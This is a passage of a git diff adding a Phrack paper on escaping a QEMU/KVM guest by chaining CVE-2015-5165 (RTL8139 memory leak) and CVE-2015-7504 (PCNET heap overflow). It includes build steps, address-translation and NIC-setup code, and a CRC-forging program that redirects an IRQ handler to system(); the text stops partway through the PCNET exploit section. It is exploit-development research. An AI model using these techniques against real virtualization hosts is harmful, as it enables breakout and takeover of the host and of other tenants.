Christopher Salls, Andrew Dutcher, Ruoyu Wang, +Jacopo Corbetta, Yan Shoshitaishvili, Christopher Kruegel, Giovanni Vigna +Proceedings of the Network and Distributed System Security Symposium (NDSS) +San Diego, CA February 2016 + +[ArtOfWar16] (State of) The Art of War: Offensive Techniques in Binary +Analysis +Yan Shoshitaishvili, Ruoyu Wang, Christopher Salls, Nick Stephens, Mario +Polino, Andrew Dutcher, John Grosen, Siji Feng, Christophe Hauser, +Christopher Kruegel, Giovanni Vigna +Proceedings of the IEEE Symposium on Security and Privacy San Jose, CA May +2016 + +[Ramblr17] Ramblr: Making Reassembly Great Again +Ruoyu Wang, Yan Shoshitaishvili, Antonio Bianchi, Aravind Machiry, John +Grosen, Paul Grosen, Christopher Kruegel, Giovanni Vigna +Proceedings of the Network and Distributed System Security Symposium (NDSS) +San Diego, CA February 2017 + +[angr] http://angr.io + +[Inversion] https://en.wikipedia.org/wiki/Sleep_inversion + +[CGCFAQ] https://cgc.darpa.mil/CGC_FAQ.pdf diff --git a/phrack/papers/VM_escape.txt b/phrack/papers/VM_escape.txt new file mode 100644 index 0000000..8797095 --- /dev/null +++ b/phrack/papers/VM_escape.txt @@ -0,0 +1,1784 @@ +|=-----------------------------------------------------------------------=| +|=----------------------------=[ VM escape ]=----------------------------=| +|=-----------------------------------------------------------------------=| +|=-------------------------=[ QEMU Case Study ]=-------------------------=| +|=-----------------------------------------------------------------------=| +|=---------------------------=[ Mehdi Talbi ]=---------------------------=| +|=--------------------------=[ Paul Fariello ]=--------------------------=| +|=-----------------------------------------------------------------------=| + + +--[ Table of contents + + 1 - Introduction + 2 - KVW/QEMU Overview + 2.1 - Workspace Environment + 2.2 - QEMU Memory Layout + 2.3 - Address Translation + 3 - Memory Leak Exploitation + 3.1 - The Vulnerable Code + 3.2 - Setting up the Card + 3.3 - Exploit + 4 - Heap-based Overflow Exploitation + 4.1 - The Vulnerable Code + 4.2 - Setting up the Card + 4.3 - Reversing CRC + 4.4 - Exploit + 5 - Putting All Together + 5.1 - RIP Control + 5.2 - Interactive Shell + 5.3 - VM-Escape Exploit + 5.4 - Limitations + + 6 - Conclusions + 7 - Greets + 8 - References + 9 - Source Code + +--[ 1 - Introduction + +Virtual machines are nowadays heavily deployed for personal use or within +the enterprise segment. Network security vendors use for instance different +VMs to analyze malwares in a controlled and confined environment. A natural +question arises: can the malware escapes from the VM and execute code on +the host machine? + +Last year, Jason Geffner from CrowdStrike, has reported a serious bug in +QEMU affecting the virtual floppy drive code that could allow an attacker +to escape from the VM [1] to the host. Even if this vulnerability has +received considerable attention in the netsec community - probably because +it has a dedicated name (VENOM) - it wasn't the first of it's kind. + +In 2011, Nelson Elhage [2] has reported and successfully exploited a +vulnerability in QEMU's emulation of PCI device hotplugging. The exploit is +available at [3]. + +Recently, Xu Liu and Shengping Wang, from Qihoo 360, have showcased at HITB +2016 a successful exploit on KVM/QEMU. They exploited two vulnerabilities +(CVE-2015-5165 and CVE-2015-7504) present in two different network card +device emulator models, namely, RTL8139 and PCNET. During their +presentation, they outlined the main steps towards code execution on the +host machine but didn't provide any exploit nor the technical details to +reproduce it. + +In this paper, we provide a in-depth analysis of CVE-2015-5165 (a +memory-leak vulnerability) and CVE-2015-7504 (a heap-based overflow +vulnerability), along with working exploits. The combination of these two +exploits allows to break out from a VM and execute code on the target host. +We discuss the technical details to exploit the vulnerabilities on QEMU's +network card device emulation, and provide generic techniques that could be +re-used to exploit future bugs in QEMU. For instance an interactive +bindshell that leverages on shared memory areas and shared code. + +--[ 2 - KVM/QEMU Overview + +KVM (Kernal-based Virtual Machine) is a kernel module that provides full +virtualization infrastructure for user space programs. It allows one to run +multiple virtual machines running unmodified Linux or Windows images. + +The user space component of KVM is included in mainline QEMU (Quick +Emulator) which handles especially devices emulation. + +----[ 2.1 - Workspace Environment + +In effort to make things easier to those who want to use the sample code +given throughout this paper, we provide here the main steps to reproduce +our development environment. + +Since the vulnerabilities we are targeting has been already patched, we +need to checkout the source for QEMU repository and switch to the commit +that precedes the fix for these vulnerabilities. Then, we configure QEMU +only for target x86_64 and enable debug: + + $ git clone git://git.qemu-project.org/qemu.git + $ cd qemu + $ git checkout bd80b59 + $ mkdir -p bin/debug/native + $ cd bin/debug/native + $ ../../../configure --target-list=x86_64-softmmu --enable-debug \ + $ --disable-werror + $ make + +In our testing environment, we build QEMU using version 4.9.2 of Gcc. + +For the rest, we assume that the reader has already a Linux x86_64 image +that could be run with the following command line: + + $ ./qemu-system-x86_64 -enable-kvm -m 2048 -display vnc=:89 \ + $ -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 \ + $ -netdev user,id=t1, -device pcnet,netdev=t1,id=nic1 \ + $ -drive file=,format=qcow2,if=ide,cache=writeback + +We allocate 2GB of memory and create two network interface cards: RTL8139 +and PCNET. + +We are running QEMU on a Debian 7 running a 3.16 kernel on x_86_64 +architecture. + +----[ 2.2 - QEMU Memory Layout + +The physical memory allocated for the guest is actually a mmapp'ed private +region in the virtual address space of QEMU. It's important to note that +the PROT_EXEC flag is not enabled while allocating the physical memory of +the guest. + +The following figure illustrates how the guest's memory and host's memory +cohabits. + + Guest' processes + +--------------------+ +Virtual addr space | | + +--------------------+ + | | + \__ Page Table \__ + \ \ + | | Guest kernel + +----+--------------------+----------------+ +Guest's phy. memory | | | | + +----+--------------------+----------------+ + | | + \__ \__ + \ \ + | QEMU process | + +----+------------------------------------------+ +Virtual addr space | | | + +----+------------------------------------------+ + | | + \__ Page Table \__ + \ \ + | | + +----+-----------------------------------------------++ +Physical memory | | || + +----+-----------------------------------------------++ + +Additionaly, QEMU reserves a memory region for BIOS and ROM. These mappings +are available in QEMU's maps file: + +7f1824ecf000-7f1828000000 rw-p 00000000 00:00 0 +7f1828000000-7f18a8000000 rw-p 00000000 00:00 0 [2 GB of RAM] +7f18a8000000-7f18a8992000 rw-p 00000000 00:00 0 +7f18a8992000-7f18ac000000 ---p 00000000 00:00 0 +7f18b5016000-7f18b501d000 r-xp 00000000 fd:00 262489 [first shared lib] +7f18b501d000-7f18b521c000 ---p 00007000 fd:00 262489 ... +7f18b521c000-7f18b521d000 r--p 00006000 fd:00 262489 ... +7f18b521d000-7f18b521e000 rw-p 00007000 fd:00 262489 ... + + ... [more shared libs] + +7f18bc01c000-7f18bc5f4000 r-xp 00000000 fd:01 30022647 [qemu-system-x86_64] +7f18bc7f3000-7f18bc8c1000 r--p 005d7000 fd:01 30022647 ... +7f18bc8c1000-7f18bc943000 rw-p 006a5000 fd:01 30022647 ... + +7f18bd328000-7f18becdd000 rw-p 00000000 00:00 0 [heap] +7ffded947000-7ffded968000 rw-p 00000000 00:00 0 [stack] +7ffded968000-7ffded96a000 r-xp 00000000 00:00 0 [vdso] +7ffded96a000-7ffded96c000 r--p 00000000 00:00 0 [vvar] +ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] + +A more detailed explanation of memory management in virtualized environment +can be found at [4]. + +----[ 2.3 - Address Translation + +Within QEMU there exist two translation layers: + +- From a guest virtual address to guest physical address. In our exploit, + we need to configure network card devices that require DMA access. For + example, we need to provide the physical address of Tx/Rx buffers to + correctly configure the network card devices. + +- From a guest physical address to QEMU's virtual address space. In our + exploit, we need to inject fake structures and get their precise address + in QEMU's virtual address space. + +On x64 systems, a virtual address is made of a page offset (bits 0-11) and +a page number. On linux systems, the pagemap file enables userspace process +with CAP_SYS_ADMIN privileges to find out which physical frame each virtual +page is mapped to. The pagemap file contains for each virtual page a 64-bit +value well-documented in kernel.org [5]: + +- Bits 0-54 : physical frame number if present. +- Bit 55 : page table entry is soft-dirty. +- Bit 56 : page exclusively mapped. +- Bits 57-60 : zero +- Bit 61 : page is file-page or shared-anon. +- Bit 62 : page is swapped. +- Bit 63 : page is present. + +To convert a virtual address to a physical one, we rely on Nelson Elhage's +code [3]. The following program allocates a buffer, fills it with the +string "Where am I?" and prints its physical address: + +---[ mmu.c ]--- +#include +#include +#include +#include +#include +#include +#include + +#define PAGE_SHIFT 12 +#define PAGE_SIZE (1 << PAGE_SHIFT) +#define PFN_PRESENT (1ull << 63) +#define PFN_PFN ((1ull << 55) - 1) + +int fd; + +uint32_t page_offset(uint32_t addr) +{ + return addr & ((1 << PAGE_SHIFT) - 1); +} + +uint64_t gva_to_gfn(void *addr) +{ + uint64_t pme, gfn; + size_t offset; + offset = ((uintptr_t)addr >> 9) & ~7; + lseek(fd, offset, SEEK_SET); + read(fd, &pme, 8); + if (!(pme & PFN_PRESENT)) + return -1; + gfn = pme & PFN_PFN; + return gfn; +} + +uint64_t gva_to_gpa(void *addr) +{ + uint64_t gfn = gva_to_gfn(addr); + assert(gfn != -1); + return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr); +} + +int main() +{ + uint8_t *ptr; + uint64_t ptr_mem; + + fd = open("/proc/self/pagemap", O_RDONLY); + if (fd < 0) { + perror("open"); + exit(1); + } + + ptr = malloc(256); + strcpy(ptr, "Where am I?"); + printf("%s\n", ptr); + ptr_mem = gva_to_gpa(ptr); + printf("Your physical address is at 0x%"PRIx64"\n", ptr_mem); + + getchar(); + return 0; +} + +If we run the above code inside the guest and attach gdb to the QEMU +process, we can see that our buffer is located within the physical address +space allocated for the guest. More precisely, we note that the outputted +address is actually an offset from the base address of the guest physical +memory: + +root@debian:~# ./mmu +Where am I? +Your physical address is at 0x78b0d010 + +(gdb) info proc mappings +process 14791 +Mapped address spaces: + + Start Addr End Addr Size Offset objfile + 0x7fc314000000 0x7fc314022000 0x22000 0x0 + 0x7fc314022000 0x7fc318000000 0x3fde000 0x0 + 0x7fc319dde000 0x7fc31c000000 0x2222000 0x0 + 0x7fc31c000000 0x7fc39c000000 0x80000000 0x0 + ... + +(gdb) x/s 0x7fc31c000000 + 0x78b0d010 +0x7fc394b0d010: "Where am I?" + +--[ 3 - Memory Leak Exploitation + +In the following, we will exploit CVE-2015-5165 - a memory leak +vulnerability that affects the RTL8139 network card device emulator - in +order to reconstruct the memory layout of QEMU. More precisely, we need to +leak (i) the base address of the .text segment in order to build our +shellcode and (ii) the base address of the physical memory allocated for +the guest in order to be able to get the precise address of some injected +dummy structures. + +----[ 3.1 - The vulnerable Code + +The REALTEK network card supports two receive/transmit operation modes: C +mode and C+ mode. When the card is set up to use C+, the NIC device +emulator miscalculates the length of IP packet data and ends up sending +more data than actually available in the packet. + +The vulnerability is present in the rtl8139_cplus_transmit_one function +from hw/net/rtl8139.c: + +/* ip packet header */ +ip_header *ip = NULL; +int hlen = 0; +uint8_t ip_protocol = 0; +uint16_t ip_data_len = 0; + +uint8_t *eth_payload_data = NULL; +size_t eth_payload_len = 0; + +int proto = be16_to_cpu(*(uint16_t *)(saved_buffer + 12)); +if (proto == ETH_P_IP) +{ + DPRINTF("+++ C+ mode has IP packet\n"); + + /* not aligned */ + eth_payload_data = saved_buffer + ETH_HLEN; + eth_payload_len = saved_size - ETH_HLEN; + + ip = (ip_header*)eth_payload_data; + + if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) { + DPRINTF("+++ C+ mode packet has bad IP version %d " + "expected %d\n", IP_HEADER_VERSION(ip), + IP_HEADER_VERSION_4); + ip = NULL; + } else { + hlen = IP_HEADER_LENGTH(ip); + ip_protocol = ip->ip_p; + ip_data_len = be16_to_cpu(ip->ip_len) - hlen; + } +} + +The IP header contains two fields hlen and ip->ip_len that represent the +length of the IP header (20 bytes considering a packet without options) and +the total length of the packet including the ip header, respectively. As +shown at the end of the snippet of code given below, there is no check to +ensure that ip->ip_len >= hlen while computing the length of IP data +(ip_data_len). As the ip_data_len field is encoded as unsigned short, this +leads to sending more data than actually available in the transmit buffer. + +More precisely, the ip_data_len is later used to compute the length of TCP +data that are copied - chunk by chunk if the data exceeds the size of the +MTU - into a malloced buffer: + +int tcp_data_len = ip_data_len - tcp_hlen; +int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen; + +int is_last_frame = 0; + +for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len; + tcp_send_offset += tcp_chunk_size) { + uint16_t chunk_size = tcp_chunk_size; + + /* check if this is the last frame */ + if (tcp_send_offset + tcp_chunk_size >= tcp_data_len) { + is_last_frame = 1; + chunk_size = tcp_data_len - tcp_send_offset; + } + + memcpy(data_to_checksum, saved_ip_header + 12, 8); + + if (tcp_send_offset) { + memcpy((uint8_t*)p_tcp_hdr + tcp_hlen, + (uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset, + chunk_size); + } + + /* more code follows */ +} + +So, if we forge a malformed packet with a corrupted length size (e.g. +ip->ip_len = hlen - 1), then we can leak approximatively 64 KB from QEMU's +heap memory. Instead of sending a single packet, the network card device +emulator will end up by sending 43 fragmented packets. + +----[ 3.2 - Setting up the Card + +In order to send our malformed packet and read leaked data, we need to +configure first Rx and Tx descriptors buffers on the card, and set up some +flags so that our packet flows through the vulnerable code path. + +The figure below shows the RTL8139 registers. We will not detail all of +them but only those which are relevant to our exploit: + + +---------------------------+----------------------------+ + 0x00 | MAC0 | MAR0 | + +---------------------------+----------------------------+ + 0x10 | TxStatus0 | + +--------------------------------------------------------+ + 0x20 | TxAddr0 | + +-------------------+-------+----------------------------+ + 0x30 | RxBuf |ChipCmd| | + +-------------+------+------+----------------------------+ + 0x40 | TxConfig | RxConfig | ... | + +-------------+-------------+----------------------------+ + | | + | skipping irrelevant registers | + | | + +---------------------------+--+------+------------------+ + 0xd0 | ... | |TxPoll| ... | + +-------+------+------------+--+------+--+---------------+ + 0xe0 | CpCmd | ... |RxRingAddrLO|RxRingAddrHI| ... | + +-------+------+------------+------------+---------------+ + +- TxConfig: Enable/disable Tx flags such as TxLoopBack (enable loopback + test mode), TxCRC (do not append CRC to Tx Packets), etc. +- RxConfig: Enable/disable Rx flags such as AcceptBroadcast (accept + broadcast packets), AcceptMulticast (accept multicast packets), etc. +- CpCmd: C+ command register used to enable some functions such as + CplusRxEnd (enable receive), CplusTxEnd (enable transmit), etc. +- TxAddr0: Physical memory address of Tx descriptors table. +- RxRingAddrLO: Low 32-bits physical memory address of Rx descriptors + table. +- RxRingAddrHI: High 32-bits physical memory address of Rx descriptors + table. +- TxPoll: Tell the card to check Tx descriptors. + +A Rx/Tx-descriptor is defined by the following structure where buf_lo and +buf_hi are low 32 bits and high 32 bits physical memory address of Tx/Rx +buffers, respectively. These addresses point to buffers holding packets to +be sent/received and must be aligned on page size boundary. The variable +dw0 encodes the size of the buffer plus additional flags such as the +ownership flag to denote if the buffer is owned by the card or the driver. + +struct rtl8139_desc { + uint32_t dw0; + uint32_t dw1; + uint32_t buf_lo; + uint32_t buf_hi; +}; + +The network card is configured through in*() out*() primitives (from +sys/io.h). We need to have CAP_SYS_RAWIO privileges to do so. The following +snippet of code configures the card and sets up a single Tx descriptor. + +#define RTL8139_PORT 0xc000 +#define RTL8139_BUFFER_SIZE 1500 + +struct rtl8139_desc desc; +void *rtl8139_tx_buffer; +uint32_t phy_mem; + +rtl8139_tx_buffer = aligned_alloc(PAGE_SIZE, RTL8139_BUFFER_SIZE); +phy_mem = (uint32)gva_to_gpa(rtl8139_tx_buffer); + +memset(&desc, 0, sizeof(struct rtl8139_desc)); + +desc->dw0 |= CP_TX_OWN | CP_TX_EOR | CP_TX_LS | CP_TX_LGSEN | + CP_TX_IPCS | CP_TX_TCPCS; +desc->dw0 += RTL8139_BUFFER_SIZE; + +desc.buf_lo = phy_mem; + +iopl(3); + +outl(TxLoopBack, RTL8139_PORT + TxConfig); +outl(AcceptMyPhys, RTL8139_PORT + RxConfig); + +outw(CPlusRxEnb|CPlusTxEnb, RTL8139_PORT + CpCmd); +outb(CmdRxEnb|CmdTxEnb, RTL8139_PORT + ChipCmd); + +outl(phy_mem, RTL8139_PORT + TxAddr0); +outl(0x0, RTL8139_PORT + TxAddr0 + 0x4); + +----[ 3.3 - Exploit + +The full exploit (cve-2015-5165.c) is available inside the attached source +code tarball. The exploit configures the required registers on the card and +sets up Tx and Rx buffer descriptors. Then it forges a malformed IP packet +addressed to the MAC address of the card. This enables us to read the +leaked data by accessing the configured Rx buffers. + +While analyzing the leaked data we have observed that several function +pointers are present. A closer look reveals that these functions pointers +are all members of a same QEMU internal structure: + +typedef struct ObjectProperty +{ + gchar *name; + gchar *type; + gchar *description; + ObjectPropertyAccessor *get; + ObjectPropertyAccessor *set; + ObjectPropertyResolve *resolve; + ObjectPropertyRelease *release; + void *opaque; + + QTAILQ_ENTRY(ObjectProperty) node; +} ObjectProperty; + +QEMU follows an object model to manage devices, memory regions, etc. At +startup, QEMU creates several objects and assigns to them properties. For +example, the following call adds a "may-overlap" property to a memory +region object. This property is endowed with a getter method to retrieve +the value of this boolean property: + +object_property_add_bool(OBJECT(mr), "may-overlap", + memory_region_get_may_overlap, + NULL, /* memory_region_set_may_overlap */ + &error_abort); + +The RTL8139 network card device emulator reserves a 64 KB on the heap to +reassemble packets. There is a large chance that this allocated buffer fits +on the space left free by destroyed object properties. + +In our exploit, we search for known object properties in the leaked memory. +More precisely, we are looking for 80 bytes memory chunks (chunk size of a +free'd ObjectProperty structure) where at least one of the function +pointers is set (get, set, resolve or release). Even if these addresses are +subject to ASLR, we can still guess the base address of the .text section. +Indeed, their page offsets are fixed (12 least significant bits or virtual +addresses are not randomized). We can do some arithmetics to get the +address of some of QEMU's useful functions. We can also derive the address +of some LibC functions such as mprotect() and system() from their PLT +entries. + +We have also noticed that the address PHY_MEM + 0x78 is leaked several +times, where PHY_MEM is the start address of the physical memory allocated +for the guest. + +The current exploit searches the leaked memory and tries to resolves (i) +the base address of the .text segment and (ii) the base address of the +physical memory. + +--[ 4 - Heap-based Overflow Exploitation + +This section discusses the vulnerability CVE-2015-7504 and provides an +exploit that gets control over the %rip register. + +----[ 4.1 - The vulnerable Code + +The AMD PCNET network card emulator is vulnerable to a heap-based overflow +when large-size packets are received in loopback test mode. The PCNET +device emulator reserves a buffer of 4 kB to store packets. If the ADDFCS +flag is enabled on Tx descriptor buffer, the card appends a CRC to received +packets as shown in the following snippet of code in pcnet_receive() +function from hw/net/pcnet.c. This does not pose a problem if the size of +the received packets are less than 4096 - 4 bytes. However, if the packet +has exactly 4096 bytes, then we can overflow the destination buffer with 4 +bytes. + +uint8_t *src = s->buffer; + +/* ... */ + +if (!s->looptest) { + memcpy(src, buf, size); + /* no need to compute the CRC */ + src[size] = 0; + src[size + 1] = 0; + src[size + 2] = 0; + src[size + 3] = 0; + size += 4; +} else if (s->looptest == PCNET_LOOPTEST_CRC || + !CSR_DXMTFCS(s) || size < MIN_BUF_SIZE+4) { + uint32_t fcs = ~0; + uint8_t *p = src; + + while (p != &src[size]) + CRC(fcs, *p++); + *(uint32_t *)p = htonl(fcs); + size += 4; +} + +In the above code, s points to PCNET main structure, where we can see that +beyond our vulnerable buffer, we can corrupt the value of the irq variable: + +struct PCNetState_st { + NICState *nic; + NICConf conf; + QEMUTimer *poll_timer; + int rap, isr, lnkst; + uint32_t rdra, tdra; + uint8_t prom[16]; + uint16_t csr[128]; + uint16_t bcr[32]; + int xmit_pos; + uint64_t timer; + MemoryRegion mmio; + uint8_t buffer[4096]; + qemu_irq irq; + void (*phys_mem_read)(void *dma_opaque, hwaddr addr, + uint8_t *buf, int len, int do_bswap); + void (*phys_mem_write)(void *dma_opaque, hwaddr addr, + uint8_t *buf, int len, int do_bswap); + void *dma_opaque; + int tx_busy; + int looptest; +}; + +The variable irq is a pointer to IRQState structure that represents a +handler to execute: + +typedef void (*qemu_irq_handler)(void *opaque, int n, int level); + +struct IRQState { + Object parent_obj; + qemu_irq_handler handler; + void *opaque; + int n; +}; + +This handler is called several times by the PCNET card emulator. For +instance, at the end of pcnet_receive() function, there is call a to +pcnet_update_irq() which in turn calls qemu_set_irq(): + +void qemu_set_irq(qemu_irq irq, int level) +{ + if (!irq) + return; + + irq->handler(irq->opaque, irq->n, level); +} + +So, what we need to exploit this vulnerability: + +- allocate a fake IRQState structure with a handler to execute (e.g. + system()). + +- compute the precise address of this allocated fake structure. Thanks to + the previous memory leak, we know exactly where our fake structure + resides in QEMU's process memory (at some offset from the base address + of the guest's physical memory). + +- forge a 4 kB malicious packets. + +- patch the packet so that the computed CRC on that packet matches the + address of our fake IRQState structure. + +- send the packet. + +When this packet is received by the PCNET card, it is handled by the +pcnet_receive function() that performs the following actions: + +- copies the content of the received packet into the buffer variable. +- computes a CRC and appends it to the buffer. The buffer is overflowed + with 4 bytes and the value of irq variable is corrupted. +- calls pcnet_update_irq() that in turns calls qemu_set_irq() with the + corrupted irq variable. Out handler is then executed. + +Note that we can get control over the first two parameters of the +substituted handler (irq->opaque and irq->n), but thanks to a little trick +that we will see later, we can get control over the third parameter too +(level parameter). This will be necessary to call mprotect() function. + +Note also that we corrupt an 8-byte pointer with 4 bytes. This is +sufficient in our testing environment to successfully get control over the +%rip register. However, this poses a problem with kernels compiled without +the CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. This issue is discussed in +section 5.4. + +----[ 4.2 - Setting up the Card + +Before going further, we need to set up the PCNET card in order to +configure the required flags, set up Tx and Rx descriptor buffers and +allocate ring buffers to hold packets to transmit and receive. + +The AMD PCNET card could be accessed in 16 bits mode or 32 bits mode. This +depends on the current value of DWI0 (value stored in the card). In the +following, we detail the main registers of the PCNET card in 16 bits access +mode as this is the default mode after a card reset: + + 0 16 + +----------------------------------+ + | EPROM | + +----------------------------------+ + | RDP - Data reg for CSR | + +----------------------------------+ + | RAP - Index reg for CSR and BCR | + +----------------------------------+ + | Reset reg | + +----------------------------------+ + | BDP - Data reg for BCR | + +----------------------------------+ + + +The card can be reset to default by accessing the reset register. + +The card has two types of internal registers: CSR (Control and Status +Register) and BCR (Bus Control Registers). Both registers are accessed by +setting first the index of the register that we want to access in the RAP +(Register Address Port) register. For instance, if we want to init and +restart the card, we need to set bit0 and bit1 to 1 of register CSR0. This +can be done by writing 0 to RAP register in order to select the register +CSR0, then by setting register CSR to 0x3: + +outw(0x0, PCNET_PORT + RAP); +outw(0x3, PCNET_PORT + RDP); + +The configuration of the card could be done by filling an initialization +structure and passing the physical address of this structure to the card +(through register CSR1 and CSR2): + +struct pcnet_config { + uint16_t mode; /* working mode: promiscusous, looptest, etc. */ + uint8_t rlen; /* number of rx descriptors in log2 base */ + uint8_t tlen; /* number of tx descriptors in log2 base */ + uint8_t mac[6]; /* mac address */ + uint16_t _reserved; + uint8_t ladr[8]; /* logical address filter */ + uint32_t rx_desc; /* physical address of rx descriptor buffer */ + uint32_t tx_desc; /* physical address of tx descriptor buffer */ +}; + +----[ 4.3 - Reversing CRC + +As discussed previously, we need to fill a packet with data in such a way +that the computed CRC matches the address of our fake structure. +Fortunately, the CRC is reversible. Thanks to the ideas exposed in [6], we +can apply a 4-byte patch to our packet so that the computed CRC matches a +value of our choice. The source code reverse-crc.c applies a patch to a +pre-filled buffer so that the computed CRC is equal to 0xdeadbeef. + +---[ reverse-crc.c ]--- +#include +#include + +#define CRC(crc, ch) (crc = (crc >> 8) ^ crctab[(crc ^ (ch)) & 0xff]) + +/* generated using the AUTODIN II polynomial + * x^32 + x^26 + x^23 + x^22 + x^16 + + * x^12 + x^11 + x^10 + x^8 + x^7 + x^5 + x^4 + x^2 + x^1 + 1 + */ +static const uint32_t crctab[256] = { + 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, + 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, + 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, + 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, + 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, + 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, + 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, + 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, + 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, + 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, + 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, + 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, + 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, + 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, + 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, + 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, + 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, + 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, + 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, + 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, + 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, + 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, + 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, + 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, + 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, + 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, + 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, + 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, + 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, + 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, + 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, + 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, + 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, + 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, + 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, + 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, + 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, + 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, + 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, + 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, + 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, + 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, + 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, + 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, + 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, + 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, + 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, + 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, + 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, + 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, + 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, + 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, + 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, + 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, + 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, + 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, + 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, + 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, + 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, + 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, + 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, + 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, + 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, + 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d, +}; + +uint32_t crc_compute(uint8_t *buffer, size_t size) +{ + uint32_t fcs = ~0; + uint8_t *p = buffer; + + while (p != &buffer[size]) + CRC(fcs, *p++); + + return fcs; +} + +uint32_t crc_reverse(uint32_t current, uint32_t target) +{ + size_t i = 0, j; + uint8_t *ptr; + uint32_t workspace[2] = { current, target }; + for (i = 0; i < 2; i++) + workspace[i] &= (uint32_t)~0; + ptr = (uint8_t *)(workspace + 1); + for (i = 0; i < 4; i++) { + j = 0; + while(crctab[j] >> 24 != *(ptr + 3 - i)) j++; + *((uint32_t *)(ptr - i)) ^= crctab[j]; + *(ptr - i - 1) ^= j; + } + return *(uint32_t *)(ptr - 4); +} + + +int main() +{ + uint32_t fcs; + uint32_t buffer[2] = { 0xcafecafe }; + uint8_t *ptr = (uint8_t *)buffer; + + fcs = crc_compute(ptr, 4); + printf("[+] current crc = %010p, required crc = \n", fcs); + + fcs = crc_reverse(fcs, 0xdeadbeef); + printf("[+] applying patch = %010p\n", fcs); + buffer[1] = fcs; + + fcs = crc_compute(ptr, 8); + if (fcs == 0xdeadbeef) + printf("[+] crc patched successfully\n"); +} + +----[ 4.4 - Exploit + +The exploit (file cve-2015-7504.c from the attached source code tarball) +resets the card to its default settings, then configures Tx and Rx +descriptors and sets the required flags, and finally inits and restarts the +card to push our network card config. + +The rest of the exploit simply triggers the vulnerability that crashes QEMU +with a single packet. As shown below, qemu_set_irq is called with a +corrupted irq variable pointing to 0x7f66deadbeef. 